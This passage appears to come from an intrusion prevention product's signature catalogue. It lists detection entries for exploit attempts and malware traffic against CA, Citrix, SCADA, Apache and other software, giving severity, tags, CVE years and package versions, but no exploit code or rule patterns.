Last changed: sgpkg-ips-148-2032
Vulnerability: BrightStor-Arcserve-Enterprise-Backup-Discovery-Service-Servicepc-BOF
Description:
Back to top

Generic_CA-BrightStor-Arcserve-Backup-Portmapper-TADDR2UADDR-DOS

About this situation: Attempt to exploit denial of service vulnerability in Computer Associates BrightStor ARCserve Backup system detected
Context: UDP Packet Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor, CVE2007, Any Operating System not specific, Computer Associates BrightStor not specific, Potential Denial of Service
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: CA-BrightStor-Arcserve-Backup-Portmapper-TADDR2UADDR-DOS
Description:
Back to top

Generic_CA-BrightStor-Arcserve-Enterprise-Backup-UDP-BOF

About this situation: Attempt to exploit a buffer overflow in CA BrightStorARCServe/Enterprise Backup
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates BrightStor, CVE2005, Any Operating System not specific, Computer Associates BrightStor not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-359-4219
Vulnerability: BrightStor-Arcserve-Enterprise-Backup-UDP-BOF
Description:
Back to top

Generic_CA-License-Client-Getconfig-BOF

About this situation: Attempt to exploit a buffer overflow in CA License Client
Context: TCP Server Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, Computer Associates License, CVE2005, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-45-1210
Last changed: sgpkg-ips-402-4219
Vulnerability: CA-License-Client-Server-Getconfig-BOF
Description:
Back to top

Generic_CA-License-Client-PUTOLF-Request-Directory-Traversal

About this situation: Attempt to write an arbitrary file on CA License Client
Context: TCP Server Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, Computer Associates License, CVE2005, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-22-1210
Last changed: sgpkg-ips-325-4219
Vulnerability: CA-License-Client-PUTOLF-Request-Directory-Traversal
Description:
Back to top

Generic_CA-License-Server-Getconfig-BOF

About this situation: Attempt to exploit a buffer overflow in CA License Server
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, Computer Associates License, CVE2005, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-45-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: CA-License-Client-Server-Getconfig-BOF
Description:
Back to top

Generic_CA-License-Software-GCR-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the Computer Associates License software of Computer Associates products
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates License, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-158-2032
Vulnerability: CA-License-Software-GCR-Buffer-Overflow
Description:
Back to top

Generic_CA-License-Software-Invalid-Command-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the Computer Associates License software in Computer Associates products
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates License, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: CA-License-Software-Invalid-Command-Buffer-Overflow
Description:
Back to top

Generic_CA-License-Software-PUTOLF-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in the Computer Associates License software in Computer Associates products detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates License, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-45-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: CA-License-Software-PUTOLF-Buffer-Overflow
Description:
Back to top

Generic_CA-Message-Queuing-BOF

About this situation: Attempt to exploit buffer overflow in CA Message Queue
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, CA Message Queuing, CVE2005, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-43-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Generic-CA-Message_Queuing-BOF
Description:
Back to top

Generic_CA-Multiple-Products-Console-Server-Login-Credentials-Handling-BOF

About this situation: Buffer overflow exploit against the Console Server in multiple Computer Associates products detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Computer Associates Protection Suite 3, Computer Associates Anti-Spyware for the Enterprise 8, Computer Associates Threat Manager for the Enterprise, Computer Associates Anti-Virus for the Enterprise, CVE2007, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: CA-Multiple-Products-Console-Server-Login-Credentials-Handling-BOF
Description:
Back to top

Generic_Cisco-Unified-Communications-Manager-CTL-Provider-Heap-Overflow

About this situation: A possible attempt to exploit a vulnerability in Cisco Systems Unified CallManager detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Unified CallManager, Cisco Systems Unified Communications Manager, CVE2008, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-149-2032
Vulnerability: CTL_Cisco-Unified-Communications-Manager-CTL-Provider-Heap-Overflow
Description:
Back to top

Generic_Citadel-UX-Lprintf-Function-Format-String

About this situation: Attempt to exploit a format string vulnerability in Citadel/UX
Context: TCP Client Stream Unknown
Severity: 10
Tags: Unix, x86, Citadel, CVE2004, Unix not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Citadel_UX-Lprintf-Function-Format-String
Description:
Back to top

Generic_Citrix-Presentation-Server-IMA-Invalid-Event-Data-Length-DOS

About this situation: Detects denial of service exploits against Citrix Presentation server
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Citrix Presentation Server, CVE2006, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Citrix-Presentation-Server-IMA-Invalid-Event-Data-Length-DOS
Description:
Back to top

Generic_Citrix-Provisioning-Services-Opcode-40020006-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in Citrix Systems Provisioning Services detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Provisioning Services, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Citrix-Provisioning-Services-Opcode-40020006-Integer-Underflow
Description:
Back to top

Generic_Citrix-Provisioning-Services-Opcode-40020010-Stack-Buffer-Overflow

About this situation: An attempt to cause a buffer overflow in Citrix Provisioning Services Detected
Context: UDP Packet Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Provisioning Services, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-402-4219
Last changed: sgpkg-ips-402-4219
Vulnerability: Citrix-Provisioning-Services-Opcode-40020010-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-7t-Interactive-Graphical-SCADA-Arbitrary-File-Execution

About this situation: An attempt to exploit a vulnerability in 7T Interactive Graphical SCADA System
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, 7T Interactive Graphical SCADA System, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1399-5242
Vulnerability: 7t-Interactive-Graphical-SCADA-Arbitrary-File-Execution
Description:
Back to top

Generic_CS-7t-Interactive-Graphical-SCADA-Arbitrary-File-Read-And-Overwrite

About this situation: An attempt to exploit a vulnerability in 7T Interactive Graphical SCADA System
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, 7T Interactive Graphical SCADA System, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-1503-5242
Vulnerability: 7t-Interactive-Graphical-SCADA-Arbitrary-File-Read-And-Overwrite
Description:
Back to top

Generic_CS-7t-Interactive-Graphical-SCADA-File-Operations-Buffer-Overflows

About this situation: An attempt to exploit a vulnerability in 7T Interactive Graphical SCADA System detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, 7T Interactive Graphical SCADA System, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-393-4219
Last changed: sgpkg-ips-1323-5242
Vulnerability: 7t-Interactive-Graphical-SCADA-File-Operations-Buffer-Overflows
7t-Interactive-Graphical-SCADA-DoS
Description:
Back to top

Generic_CS-ABB-Microscada-Wserver-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in ABB MicroSCADA detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ABB MicroSCADA, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-556-5211
Vulnerability: ABB-Microscada-Wserver-Command-Execution
ABB-Microscada-Wserver-Multiple-Buffer-Overflows
Description:
Back to top

Generic_CS-ABB-Microscada-Wserver-Multiple-Vulnerabilities-2

About this situation: An attempt to exploit a vulnerability in ABB MicroSCADA detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ABB MicroSCADA, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: ABB-Microscada-Wserver-Command-Execution
ABB-Microscada-Wserver-Multiple-Buffer-Overflows
Description:
Back to top

Generic_CS-Acronis-Cyber-Infrastructure-Default-Password-RCE

About this situation: An attempt to exploit a vulnerability in Acronis Cyber Infrastructure detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Unix, Linux, Any Hardware, Acronis Cyber Infrastructure, CVE2023, Unix not specific, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1808-5242
Last changed: sgpkg-ips-1808-5242
Vulnerability: Acronis-Cyber-Infrastructure-Default-Password-RCE
Description:
Back to top

Generic_CS-ActFax-Raw-Server-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ActFax ActFax Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, ActFax Server, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-520-5211
Vulnerability: ActXax-Raw-Server-Buffer-Overflow
Description:
Back to top

Generic_CS-Adbopebot-Trojan

About this situation: Adbopebot trojan traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Adbopebot-Trojan
Description:
Back to top

Generic_CS-Adobe-ColdFusion-CVE-2019-7839-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Systems ColdFusion detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe ColdFusion, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1671-5242
Vulnerability: Adobe-ColdFusion-CVE-2019-7839-Remote-Code-Execution
Description:
Back to top

Generic_CS-Adobe-ColdFusion-CVE-2022-35690-ODBC-Agent-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe ColdFusion detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Linux, Any Hardware, Adobe ColdFusion, CVE2022, Windows not specific, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1554-5242
Last changed: sgpkg-ips-1582-5242
Vulnerability: Adobe-ColdFusion-CVE-2022-35690-ODBC-Agent-Memory-Corruption
Description:
Back to top

Generic_CS-Adroit-SCADA-Intelligence-Server-DoS

About this situation: A vulnerability in Adroit SCADA Intelligence Server
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Adroit SCADA Intelligence Server, Any Operating System not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Adroit-SCADA-Intelligence-Server-DoS
Description:
Back to top

Generic_CS-Aerospike-Database-Server-As_Sindex-Simatch_By_Iname-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Aerospike Database Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Aerospike Database Server, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-846-5242
Last changed: sgpkg-ips-846-5242
Vulnerability: Aerospike-Database-Server-As_Sindex-Simatch_By_Iname-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Aerospike-Database-Server-Rw-Fabric-Message-Code-Execution

About this situation: An attempt to exploit a vulnerability in Aerospike Database Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Aerospike Database Server, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-866-5242
Vulnerability: Aerospike-Database-Server-Rw-Fabric-Message-Code-Execution
Description:
Back to top

Generic_CS-Aerospike-Database-Server-Stack-Buffer-Overflow-CVE-2016-9054

About this situation: An attempt to exploit a vulnerability in Aerospike Database Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Aerospike Database Server, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-844-5242
Last changed: sgpkg-ips-844-5242
Vulnerability: Aerospike-Database-Server-Stack-Buffer-Overflow-CVE-2016-9054
Description:
Back to top

Generic_CS-AgentX++-Receive-PDU-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Frank Fock AgentX detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, AgentX++, CVE2010, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-303-4219
Last changed: sgpkg-ips-303-4219
Vulnerability: AgentX++-Receive-PDU-Integer-Overflow
Description:
Back to top

Generic_CS-Agentx-Receive-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Frank Fock AgentX++ detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, AgentX++, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Multiple-Vendors-Agentx-Receive-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-Ainslot.b-Traffic

About this situation: Ainslot.B traffic detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Ainslot.b-Malware
Description:
Back to top

Generic_CS-AIS-logistics-ESEL-Server-RCE

About this situation: An attempt to exploit a vulnerability in IS logistics ESEL Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, AIS logistics, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1196-5242
Vulnerability: AIS-logistics-ESEL-Server-RCE
Description:
Back to top

Generic_CS-Alienvault-Ossim-Framework-Backup-Command-Execution

About this situation: An attempt to exploit a vulnerability in AlienVault AlienVault detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, AlienVault AlienVault, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-612-5211
Vulnerability: Alienvault-Ossim-Framework-Backup-Command-Execution
Description:
Back to top

Generic_CS-Alienvault-Unified-Security-Management-AV-Forward-Deserialization-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in AlienVault Unified Security Management detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, AlienVault Unified Security Management, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-705-5211
Vulnerability: Alienvault-Unified-Security-Management-AV-Remote-Code-Execution
Description:
Back to top

Generic_CS-Allen-Bradley-PCCC-Protocol-DoS

About this situation: An attempt to exploit a vulnerability in Allen-Bradley's Legacy PCCC Protocol detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Allen Bradley, CVE2017, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1425-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Allen-Bradley-PCCC-Protocol-DoS
Description:
Back to top

Generic_CS-ALLMediaServer-SEH-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ALLMediaServer detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, ALLMediaServer, CVE2022, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: ALLMediaServer-SEH-Buffer-Overflow
Description:
Back to top

Generic_CS-Alt-N-MDaemon-Worldclient-Service-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Alt-N Technologies MDaemon detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, MDaemon, CVE2008, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Alt-N-MDaemon-Worldclient-Service-Memory-Corruption
Description:
Back to top

Generic_CS-Alusins.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Win32.Backdoor.Alusins.A-Botnet
Description:
Back to top

Generic_CS-Amcrest-Dahua-NVR-Camera-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Amcrest Dahua NVR Camera detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Vulnerability: Amcrest-Dahua-NVR-Camera-Denial-Of-Service
Description:
Back to top

Generic_CS-AmmSoft-ScriptFTP-Buffer-Overflow

About this situation: An attempt to exploit an AmmSoft ScriptFTP Buffer Overflow vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, AmmSoft ScriptFTP, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-714-5211
Last changed: sgpkg-ips-1350-5242
Vulnerability: AmmSoft-ScriptFTP-Buffer-Overflow
Description:
Back to top

Generic_CS-ANT-Studio-Web-Server-Denial-Of-Service

About this situation: A vulnerability in ANT Studio web server allowing denial of service.
Context: TCP Client Stream Unknown
Severity: 2
Tags: Windows, Any Hardware, ANT Studio, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: ANT-Studio-Web-Server-Denial-Of-Service
Description:
Back to top

Generic_CS-Apache-Activemq-Jmx-Rmiconnectorserver-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apache ActiveMQ detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache ActiveMQ, CVE2020, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1316-5242
Last changed: sgpkg-ips-1316-5242
Vulnerability: Apache-Activemq-Jmx-Rmiconnectorserver-Remote-Code-Execution
Description:
Back to top

Generic_CS-Apache-Activemq-OpenWire-Insecure-Deserialization-CVE-2023-46604

About this situation: An attempt to exploit a vulnerability in Apache ActiveMQ detected
Context: TCP Client Stream Unknown
Severity: 10
Tags: Any Operating System, Any Hardware, Apache ActiveMQ, CVE2023, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1757-5242
Vulnerability: Apache-Activemq-OpenWire-Insecure-Deserialization-CVE-2023-46604
Description:
Back to top

Generic_CS-Apache-Activemq-Shutdown-Command-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation ActiveMQ detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache ActiveMQ, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Vulnerability: Apache-Activemq-Shutdown-Command-Denial-Of-Service
Description:
Back to top

Generic_CS-Apache-Airflow-Celery-Broker-RCE-CVE-2020-11981

About this situation: An attempt to exploit a vulnerability in Apache Airflow detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Airflow, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Vulnerability: Apache-Airflow-Celery-Broker-RCE-CVE-2020-11981
Description:
Back to top

Generic_CS-Apache-Couchdb-Erlang-RCE

About this situation: An attempt to exploit a vulnerability in Apache CouchDB detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Unix, Linux, Any Hardware, Apache Software Foundation CouchDB, CVE2022, Windows not specific, Unix not specific, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1526-5242
Last changed: sgpkg-ips-1825-5242
Vulnerability: Apache-Couchdb-Erlang-RCE
Description:
Back to top

Generic_CS-Apache-James-Server-Insecure-User-Creation

About this situation: An attempt to exploit a vulnerability in Apache James Server detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Apache James Server, CVE2015, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1226-5242
Vulnerability: Apache-James-Server-Insecure-User-Creation
Description:
Back to top

Generic_CS-Apache-Log4j-SocketServer-Untrusted-Deserialization

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Log4j detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation Log4j, CVE2019, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1222-5242
Last changed: sgpkg-ips-1541-5242
Vulnerability: Apache-Log4j-SocketServer-Untrusted-Deserialization
Description:
Back to top

Generic_CS-Apache-OpenMeetings-Cluster-Mode-Insecure-Deserialization-CVE-2024-54676

About this situation: An attempt to exploit a vulnerability in Apache OpenMeetings detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache OpenMeetings, CVE2024, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Vulnerability: Apache-OpenMeetings-Cluster-Mode-Insecure-Deserialization-CVE-2024-54676
Description:
Back to top

Generic_CS-Apache-Pulsar-JSON-Web-Token-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Pulsar detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation Pulsar, CVE2021, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1363-5242
Vulnerability: Apache-Pulsar-JSON-Web-Token-Authentication-Bypass
Description:
Back to top

Generic_CS-Apache-Qpid-Sequence-Set-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation QPID detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache QPID, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-639-5211
Vulnerability: Apache-Qpid-Sequence-Set-Denial-Of-Service
Description:
Back to top

Generic_CS-Apache-Qpid-Session.gap-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation QPID detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache QPID, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-637-5211
Vulnerability: Apache-Qpid-Session.gap-Denial-Of-Service
Description:
Back to top

Generic_CS-Apache-RocketMQ-Buildstartcommand-Command-Injection

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation RocketMQ detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache RocketMQ, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1610-5242
Last changed: sgpkg-ips-1787-5242
Vulnerability: Apache-RocketMQ-Buildstartcommand-Command-Injection
Description:
Back to top

Generic_CS-Apache-RocketMQ-Nameserver-configStorePath-Arbitrary-File-Write

About this situation: An attempt to access a vulnerable component in Apache RocketMQ detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache RocketMQ, CVE2023, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Vulnerability: Apache-RocketMQ-Nameserver-configStorePath-Arbitrary-File-Write
Description:
Back to top

Generic_CS-Apache-Spark-Auth-enabled-Standalone-Master-Command-Execution

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Spark detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Spark, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1370-5242
Last changed: sgpkg-ips-1370-5242
